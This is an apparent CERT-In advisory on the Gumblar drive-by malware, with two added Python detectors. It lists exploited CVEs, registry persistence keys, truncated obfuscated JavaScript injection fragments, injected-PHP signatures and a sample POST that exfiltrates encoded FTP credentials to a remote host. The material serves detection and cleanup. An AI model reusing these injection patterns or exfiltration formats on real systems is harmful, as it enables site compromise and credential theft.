Gumblar malware exploit
Original issue date: June 02, 2009
Updated: October 30, 2009; January 11, 2010
It has been reported that the malicious domain Gumblar dot cn (now down), which hosted the malware exploit, has been actively used to compromise thousands of websites. This is a drive-by download with multiple stages. The first stage of the exploit attempts to inject malicious code into the vulnerable website, primarily through stolen FTP credentials, poor configuration settings, vulnerable web applications, etc. Subsequently, the domain Marutz dot cn was reported to be hosting the malicious exploit.
Infected web pages may contain a script that looks like this (every infected site has its own modification of the script):
When the script is executed (every time someone visits the infected web page), another script from "gumblar . cn/rss/" is silently loaded and executed. This code is usually injected right before the <body> tag.
The second stage of this exploit occurs when a user visits a website compromised by Gumblar. The exploit tries to infect the user's system by exploiting known PDF and Flash Player vulnerabilities.
It is also reported that, instead of hosting the whole malicious exploit on a single malicious domain (gumblar .cn), thousands of legitimate sites have been compromised and are directly hosting the malicious scripts and payload, making the attack more decentralized and redundant. The attack vector is shown in the figure below:
The attack vectors are reported to be the recently reported Adobe Acrobat and Reader vulnerability (CVE-2009-3459), the Adobe Flash Player vulnerability (CVE-2007-0071) and the Microsoft Office Web Components vulnerability described in MS09-043.
The path/filename of the malicious .php file on the compromised site is identical to the path/filename of a legitimate, already existing file (usually a .gif or some other image type).
The impact of the infection is that the victim computer is not able to boot.
Websites are being injected with new types of obfuscated JavaScript strings like those below:
- <script>/*GNU GPL*/ try{window.onload = function(){var ~
- <script>/*CODE1*/ try{window.onload = function(){var ~
- <script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s =document.createElement('s&c^$#r))i($p@&t^&'.repl
Once de-obfuscated, these URLs lead to well-known domain names: joomla-org, spankwire.com, w3schools-com, google.com, bing.com, google.fr, wordpress.org.
The malicious scripts further download JavaScript that opens two links, one to a PDF file and the other to a JAR file. Once loaded, these files try to infect the system through the following vulnerabilities:
- Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security (CVE-2008-2042)
- Adobe Reader and Acrobat 'newplayer()' JavaScript Method Remote Code Execution Vulnerability (CIVN-2009-154)
- Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities (CIAD-2008-64)
Once successfully exploited, users are infected with malware such as Bredolab, Zbot variants and misleading rogue applications.
Aliases: JSRedir-R (Sophos), Trojan.Malscript.B (Symantec), Trojan:JS/Redirector
When it infects a system, the Gumblar exploit:
- Adds the following registry entries:
  - HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\ImagePath: "C:\WINDOWS\system32\asferrort.exe srv"
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: "C:\WINDOWS\Temp\wpv701242765100.exe"
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp: "c:\windows\<variable name>.exe"
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12281714: "C:\Documents and Settings\All Users\Application Data\12281714\12281714.exe"
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92291706: "C:\Documents and Settings\All Users\Application Data\92291706\92291706.exe"
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray: "c:\windows\ld08.exe"
  - HKLM\SOFTWARE\WinPcap
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemSecurity2009
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer: "http=localhost:7171"
  - HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: "80:TCP:*:Enabled:SYS32DLL"
  - HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7171:TCP: "7171:TCP:*:Enabled:SYS32DLL"
  - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe\Debugger: "ntsd -d"
  - HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\: "C:\WINDOWS\system32\547372\547372.dll"
- Infects the Windows file sqlsodbc.chm (C:\WINDOWS\System32).
- Injects malicious PHP scripts into files below ~200 KB whose extension is not one of the following:
  .zip, .rar, .gz, .jpg, .gif, .avi, .mp3, .wma, .mpg, .png, .txt, .swf, .css, .js, .log, .pdf, .ppt, .fla, .as, .tar
- Steals FTP credentials
The malware configures the network card in promiscuous mode (to capture FTP credentials from other machines on the same subnet), collects the FTP credentials and sends them to a remote host in an encoded format.
Sample traffic is given below:
POST /good/receiver/ftp HTTP/1.1
Host: 78.109.XX.XXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
ftp_uri_0=9ObqyMjmQWwGxvOwcOfhoJ%2BClWBtBM2kvnD%2F0qzByfsUN0eauuUxo6GiyNX4&ftp_source_0=xuD7lIGgQw
An entry is made in the registry for WinPcap.
- Installs fake anti-virus
Fake anti-virus software named "System Security 2009" is installed on the system.
Screenshots are given below:


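Detection logic for the credential-upload traffic shown above, written here as an added example (not CERT-In's code): it parses a raw HTTP request and flags a form-urlencoded POST to a .../receiver/ftp path whose body carries matching ftp_uri_N / ftp_source_N pairs. The sample requests, host and field values are constructed, not taken from a capture.

```python
"""Flag HTTP requests shaped like the FTP-credential upload in the sample traffic (added example)."""
import re
from urllib.parse import parse_qs

# Field names seen in the sample body: ftp_uri_<n> paired with ftp_source_<n>.
FIELD_RX = re.compile(r"^ftp_(uri|source)_(\d+)$")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def is_gumblar_ftp_upload(raw):
    """True when the request matches the exfiltration pattern in the advisory: a
    form-urlencoded POST to a .../receiver/ftp path whose body carries ftp_uri_N
    and ftp_source_N fields with matching indices."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not path.endswith("/receiver/ftp"):
        return False
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return False
    uris, sources = set(), set()
    for key in parse_qs(body, keep_blank_values=True):
        m = FIELD_RX.match(key)
        if m:
            (uris if m.group(1) == "uri" else sources).add(m.group(2))
    return bool(uris) and uris == sources

# Constructed sample requests (host and encoded values are made up, not from a real capture).
SAMPLE_EXFIL = ("POST /good/receiver/ftp HTTP/1.1\r\n"
                "Host: 198.51.100.10\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\n"
                "Content-Length: 40\r\n\r\n"
                "ftp_uri_0=QUFBQUFB&ftp_source_0=QkJCQkJC")
SAMPLE_BENIGN = ("POST /login HTTP/1.1\r\n"
                 "Host: www.example.com\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\n"
                 "Content-Length: 13\r\n\r\n"
                 "user=a&pass=b")
```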
Countermeasures:
- Site administrators are advised to check .htaccess, PHP includes and other configuration settings, and to ensure directory permissions are set appropriately.
- Search for and remove the malicious code patterns below, injected into server files (.html, .php, .js etc.):
  - <script language=javascript><!--*\n*\n*<body>
  - <?php if(!function_exists('tmp_lkojfghx'))*tmp_lkojfghx2(); ?>
  - <?php eval(base64_decode(*c7')); ?>
  - <!--*\n*(function(*.replace(*\n*-->
- Scan the system with antivirus/anti-spyware software.
- Change the FTP credentials (if any) used by administrators to upload content to the website.
- It is recommended to use SFTP (FTP over SSH) instead of plain FTP.
- Delete the files and registry entries mentioned above.
- Update Adobe Flash Player and the PDF reader (if installed) to the latest versions, and apply patches regularly.
- Obtain the SHA1 of the installed sqlsodbc.chm and compare it to the list given here. (If the SHA1 and corresponding file size do not match, it could be an indication of a Gumblar infection.)
- Review the security of the web server and website for application and operating system vulnerabilities and apply appropriate patches/updates.
- Block the domains mentioned above at the perimeter level.
- Install and maintain updated anti-virus software at gateway and desktop level.
- Install and maintain a desktop firewall and block the ports which are not required.
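A scanner that applies the search step above to a web root, written here as an added example (not a CERT-In tool): the four injected-code patterns from the countermeasures become regular expressions, and the advisory's size/extension heuristic for injected files decides which files are read. The sample page content is constructed from the fragments quoted in the advisory.

```python
"""Scan a web root for the injected-code signatures in the countermeasures (added example)."""
import os
import re
# Signatures from the countermeasures section as regular expressions; the advisory's
# "*" wildcards become non-greedy ".*?" here.
SIGNATURES = {
    "js_onload_obfuscated": re.compile(
        r"<script>/\*(?:GNU GPL|CODE1|LGPL)\*/\s*try\s*\{\s*window\.onload"),
    "php_tmp_lkojfghx": re.compile(
        r"<\?php\s+if\s*\(\s*!\s*function_exists\s*\(\s*['\"]tmp_lkojfghx['\"]\s*\)"),
    "php_eval_base64": re.compile(r"<\?php\s+eval\s*\(\s*base64_decode\s*\("),
    "html_comment_replace": re.compile(r"<!--.*?\(function\(.*?\.replace\(.*?-->", re.S),
}
# The advisory says to search .html/.php/.js files, and that PHP is injected into
# files below ~200 KB whose extension is not one of SKIP_EXT.
ALWAYS_SCAN = {".html", ".htm", ".php", ".js"}
MAX_SIZE = 200 * 1024
SKIP_EXT = {".zip", ".rar", ".gz", ".jpg", ".gif", ".avi", ".mp3", ".wma", ".mpg", ".png",
            ".txt", ".swf", ".css", ".js", ".log", ".pdf", ".ppt", ".fla", ".as", ".tar"}

def is_candidate(path, size):
    """Decide whether a file is worth reading, using the advisory's heuristics."""
    ext = os.path.splitext(path)[1].lower()
    return ext in ALWAYS_SCAN or (size < MAX_SIZE and ext not in SKIP_EXT)

def scan_text(text):
    """Return the sorted names of every signature that matches the content."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_tree(root):
    """Walk a web root and map each suspicious file to the signatures it matched."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            if not is_candidate(path, os.path.getsize(path)):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                matched = scan_text(fh.read())
            if matched:
                hits[path] = matched
    return hits

# Constructed sample pages modelled on the fragments quoted in the advisory.
SAMPLE_INFECTED = (
    "<html><head></head>\n"
    "<script>/*GNU GPL*/ try{window.onload = function(){var x=1;}}catch(e){}</script>\n"
    "<body>hello</body></html>\n"
    "<?php if(!function_exists('tmp_lkojfghx')) tmp_lkojfghx2(); ?>\n")
SAMPLE_CLEAN = "<html><body><script>window.onload = function(){};</script></body></html>\n"
```

Run scan_tree on a copy of the document root; a match is a lead to inspect by hand, since the patterns are the advisory's wildcard signatures and not a full parser.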
References
http://www.sophos.com/security/analyses/viruses-and-spyware/trojjsredirr.html
http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/
http://www.techknowme.com/blog/2009/05/fighting-the-jsredir-r-gumblarcn-trojan/comment-page-1/#comment-2
http://blog.scansafe.com/journal/2009/5/14/gumblar-qa.html
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
http://blog.scansafe.com/journal/2009/5/27/gumblar-modified-sqlsodbcchm-clue-to-infection.html
http://www.iss.net/threats/289.html
http://www.iss.net/threats/348.html
http://blogs.iss.net/index.html
http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-010809-5538-99&tabid=2
http://www.sophos.com/blogs/sophoslabs/?p=8055
http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/#more-478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2042
http://www.cert-in.org.in/vulnerability/civn-2009-154.htm
http://www.cert-in.org.in/advisory/ciad-2008-64.htm
http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-010809-5538-99
Disclaimer
The information provided herein is on an "as is" basis, without warranty of any kind.
Contact Information

Phone: +91-11-24368572
Postal address:
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003